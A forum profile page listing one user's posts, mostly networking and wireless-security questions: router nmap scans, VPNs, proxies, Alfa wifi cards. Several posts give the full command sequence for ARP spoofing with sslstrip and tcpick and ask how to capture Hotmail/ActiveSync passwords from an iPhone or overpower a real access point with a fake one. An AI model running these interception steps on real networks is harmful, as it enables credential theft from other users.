Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Everything posted by michael_kent123

  1. Well, yes, but they would have to know the password. When I SSH to the VPN IP, it asks me for my password. Unless the password to my system is obvious, I don't see a problem. Or am I too naive?
  2. I will check out the video over the weekend. One more thing that I kind of but not completely understand. I have SSH installed on my computer. If I ssh to my IP address provided by my ISP then the connection fails. However, if I connect to my VPN and then ssh to the VPN IP, I get a connection. I can login to my system using the password I use to login to my computer. I'm assuming that's how SSH is supposed to work (it's as if I was contacting my IP from a remote system) and the VPN has allowed its users to SSH to their home computers via the VPN IP. Does that make sense? Are there any security implications? Many thanks!
  3. Thanks for the information - I've done some more research as you suggested. I scanned my external IP from inside my LAN: Not shown: 997 closed ports PORT STATE SERVICE 23/tcp open telnet # 1900/tcp open upnp # Upnp is turned off on the router so I don't know why this is open. 40001/tcp open unknown # This is the way I connect to the router I scanned my external IP from my VPN IP: Note: Host seems down. If it is really up, but blocking our ping probes, try -PN Nmap done: 1 IP address (0 hosts up) scanned in 3.21 seconds I typed my external IP:40001 into the browser and, when using the VPN, it timed out. When I typed my external IP:port in (without using a VPN) it brought up the login screen. So my impression is that the router is not accessible from the internet.
  4. I have a TP-Link router and recently ran an nmap scan on it from inside my network. I'm not too worried about the results as I have turned remote admin off so the router is inaccessible from the internet. I am using the Ubuntu OS. Nonetheless, there are a few things I do not understand. Here are my results: 23/tcp open telnet 1900/tcp open upnp 2000/tcp open cisco-sccp 2001/tcp open dc 9000/tcp open cslistener Telnet makes sense; it's a way to connect to the router. Upnp I understand but, even though I've disabled it in the admin panel, it still shows "open". Maybe nmap is supposed to show it as open, even though it's closed from the perspective of the router. I don't know. Sccp (https://en.wikipedia.org/wiki/Skinny_Call_Control_Protocol) is a Cisco protocol which makes no sense to me as I don't have a Cisco router unless TP-Link has paid to use this proprietary protocol. Dc seems very mysterious and no-one seems to know what it is. Cslistener (http://brianoneill.blogspot.com/2012/02/cslistener-on-mac-osx-on-port-9000.html) maybe the Checkpoint firewall which I have not installed. More generally, is there a way to run a netstat like command on the router IP. I can telnet to it but I can't run commands like netstat to check what is happening on these ports from the router's perspective. Any ideas?
  5. I finally tried tcpick but had no success. Here is what I did. Terminal 1: echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 arpspoof -i wlan0 [router IP] Terminal 2: sslstrip -l 10000 -k Terminal 3: sudo tcpick -i wlan0 -bPS -C "port 443" Terminal 4: sudo tcpick -i wlan0 -bPC -C "port 443" I then sent an e-mail from a different device to a Hotmail address which was setup on my iPhone with ActiveSync. Tcpick showed HTTPS connections to Microsoft but did not collect any username:password combinations (neither did sslstrip.log). The tcpick server shows content like: ...r......Y.t~swj......t..J...$.#. .k.g.9.3...=.<.5./...&.%.......*.)..... ...............C.........bay405-m.hotmail.com. ................. ..........3t.. ....f...ba..L!g..Q*..fA '. +........7............x..[q..Z.J...}K........ \...%S2F..q.*X..._.T}v{......|FE.. ...... The tcpick client just showed connections to Microsoft's IP addresses. For example: SYN-SENT > SYN-SENT > RESET > RESET > I also tried using tcpick -i wlan0 -bPC -C "port 80" and tcpick -i wlan0 -bPS -C "port 80" (as i8igmac suggested). However, no data was shown. Just IP addresses. Any ideas? Thanks.
  6. Sourceforge is down atm but I'll look into this. How does it sniff / intercept / overcome SSL communications?
  7. Does anyone know about Microsoft ActiveSync? Link: https://en.wikipedia.org/wiki/Exchange_ActiveSync Basically, it is the way in which iPhone users setup their Hotmail / Outlook account. You just enter the e-mail and password and ActiveSync checks that the information is correct. You don't need to enter the POP or IMAP or SMTP details. Now, ActiveSync uses port 443 to transmit data. I thought that the username and password could be intercepted and recorded with SSL Strip. This is because the data is transmitted to the Microsoft server using HTTPS which is exactly what SSL Strip compromises when used on websites. Here is how I setup SSL Strip. I know for a fact that this works as I tested it by logging in to e-mail sites on the iPhone. echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 arpspoof -i wlan1 gateway_ip sslstrip -l 10000 -k I then sent an e-mail from a different device to the iPhone. I used Wireshark which showed that my iPhone's IP transmitted some HTTPS traffic. I assume that it logged into Microsoft servers to access the message. At this point, I am guessing that the username and password was sent to allow me to read the message. Wireshark shows a DNS request to outlook.office365.com and the iPhone's IP contacts an IP in the range - which is owned by Microsoft. This is HTTPS (over TCP) and TLSv1.2 protocols. There is also a transmission to - which is Microsoft using IMAPS. However, when I checked the SSL Strip log, nothing was recorded. Obviously, using ActiveSync is not the same as logging into a HTTPS website. But ActiveSync does use HTTPS so I thought that SSL Strip might work. Clearly I was wrong. Can anyone comment on this? Is there a way to acquire the password from an iPhone when the e-mail account is setup with ActiveSync? As more and more people move from computers to phones, I would have thought this would be an increasingly important attack vector.
  8. On a related note, I wonder if you know anything about Microsoft Active Sync. I set up a Hotmail account on my iPhone. To connect to the server, Microsoft apparently uses HTTPS on port 443. See, for example, http://www.altn.com/Support/FAQ/FAQResults/?Number=KBA-02281 I used arpspoof and SSLStrip in the normal way (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000). I then sent an e-mail from my Desktop to my Hotmail account on my iPhone. The phone downloaded the message. However, when I checked the SSLStrip log, nothing showed. When, on the iPhone, I login to a webmail account (port 443) the username:password does show in my log. I'm wondering if there is a way to intercept the username:password between Hotmail on the iPhone using SSLStrip. Any ideas? Thanks!
  9. Yes. My impression is that, with the Alfa, monitor mode is promiscious mode. It's just a question of terminology.
  10. To use SSL Strip: echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 Why is the destination port 80 since we want to redirect HTTPS traffic. Shouldn't it be port 443? Let's say I want to intercept secure POP which uses port 995. Can I just do: iptables -t nat -A PREROUTING -p tcp --destination-port 995 -j REDIRECT --to-port 10000 Or should it be port 110 (POP) considering that HTTPS apparently uses port 80 (not 443)?
  11. Promiscuous mode - ability to see packets on the wifi network you are connected to that are not directed to your MAC. Monitor mode - ability to see packets on wifi networks to which you are not connected but that your NIC can sniff. However, since modern networks are switches rather than hubs, promiscuous mode no longer really exists. Therefore, am I correct when I say that: Monitor mode is like promiscuous mode for the network you are connected to plus you can also view nearby networks. So, if I am on SSID "Hello" and my friend is on "Hello" and he sends a non-SSL username:password to his e-mail provider, and I am in monitor mode, then I can view that password in Wireshark. Is that correct? Thanks!
  12. The other issue I wanted to ask is about increasing power via antennas. I know nothing about antenna theory. I have a 9 dBi antenna for the Alfa. What is the most powerful indoor antenna I can get for the Alfa (i.e. not having to attach it to the side of a house). Does the antenna affect only tx power or also the ability to receive better?
  13. Is there any reason therefore not to increase the tx power to 30? It seems to only do good things. More specifically, if one created a "soft" or fake AP, a higher tx power would presumably overcome the "real" signals from the genuine AP?
  14. Thanks - this is a helpful explanation. There is a thread in the Pineapple section on the best Alfa for Pineapple. I am wondering what the best Alfa is for those of us who want to use it for arpspoofing, packet injection, etc. In terms of tx power, a poster seems to be suggesting that one Alfa model can provide 2 dBi. I don't understand this if you can only alter the tx power to 30 (using iw reg set BO). Thanks again!
  15. I was recently watching a video by Vivek Ramachandram on how to increase the tx power of the Alfa card. Question: what is the benefit of this? Does it allow the Alfa to "see" networks that are further away? Does it allow for packet injection over a further distance? Does it give a benefit for arpspoofing e.g. being able to transmit the fake MAC of the router over a greater distance? Can someone please articluate the benefits of tx power 30 over, say, tx power 20.
  16. I have a AWUS 036H which I'm happy with. I'm going to buy another card. I would predominantly use it for accessing wifi, arpspoofing, and packet injection. Should I get another 036H or something else?
  17. Are there any benefits to 2 watts which is, I believe, 33 dBm. After all, the maximum txpower can be set to is 30dBm (iw reg set BO).
  18. I have an Alfa AWUS036H which is, I guess, at least five years old. I want to buy an additional Alfa but have noticed there are multiple versions. A search on this forum reveals: AWUS036NEH AWUS036NHR AWUS036H AWUS036NHA AWUS036A There are numerous other versions here. I also purchased a 9dBi antenna so what ever I get needs to be able to add an antenna. If you were buying an Alfa for airmon-ng mode, packet injection, etc, what version would you get?
  19. Thank you for the answer. I have a couple of questions. I've read about HSTS (https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security). The article claims that HSTS defeats SSL Strip. I don't understand this because, using the latest version of both IE and FF, I just successfully stripped my HTTPS connections to websites like Facebook and Gmail. What I still don't understand is how the app validates the user. Is the user's username and password being sent to a server as in the traditional client / server model?
  20. I have wondered for some time how apps (e.g. Facebook, Twitter, or Instagram) on an iPhone on Android device transmit the username and password. For example, if I am using a laptop and want to login to Facebook then I browse to https://www.facebook.com and enter my username and password which is transmitted to Facebook which checks whether it is accurate or not. However, if I use the Facebook app, how is the username and password invoked? If you are a MITM and you intercept client-server communications (e.g. with SSL Strip) then you can get my Facebook username and password. However, if I am using an app (over wireless) to login to Facebook then can you as the MITM grab my login details? In all cases, we are using a wireless network.
  21. Thanks. So, in other words, HTTP can only do HTTP/S but SOCKS can do SSH (for example) and also HTTP/S. Yes?
  22. Hello, I have wondered for some time about the difference between proxy types. For example, Tor uses SOCKS 5. On the other hand, I can find lists of proxies and enter the IP:port into the HTTP proxy section of Firefox. What is the difference in practical usage between a HTTP proxy and a SOCKS 5 proxy? How are these proxies used? Are they used for different purposes? What are their advantages and disadvantages? Thank you.
  23. I have a question about the use of VPN services. If you go to www.whatismyip.com or equivalent then you see the VPN IP not the ISP IP. Normally, I have an internal 192.168.x.x IP and my ISP IP. With a VPN, I have the internal IP and the VPN IP. So, when using a VPN, does that mean that there is no ISP IP but only an internal IP and a VPN IP? In other words, does the VPN effectively replace the ISP IP with its IP? Is it: a) 192.168.x.x --> VPN IP. or b) 192.168.x.x --> ISP IP --> VPN IP. Thank you!
  24. I take your point. I was so used to having shared IPs that I forgot that the VPS means that only I use a specific IP!
  25. Here is something I do not understand even though I'm sure there is a simple answer. I SSH to my VPS. This VPS has not had DNS propagation started. I can only access it via an IP address. I upload some files to /var/www/ I then go in the web browser to the VPS IP. I can see the files e.g. index.html. Here is what I do not understand. How does the web browser know the correct content to serve me? Presumably, I am not the only person using that IP address. If I were to have linked the domain name to the IP via DNS propagation, then my domain panel would point to the nameservers of the VPS and I would have entered my domain name in the VPS control panel. Hence, when I request www.domain.com, I am given the correct files as the domain name and IP are linked. But in this case, I just type How does the VPS know what to give me? The files are stored on their servers. I do not host anything in my /var/www/ directory.
  • Create New...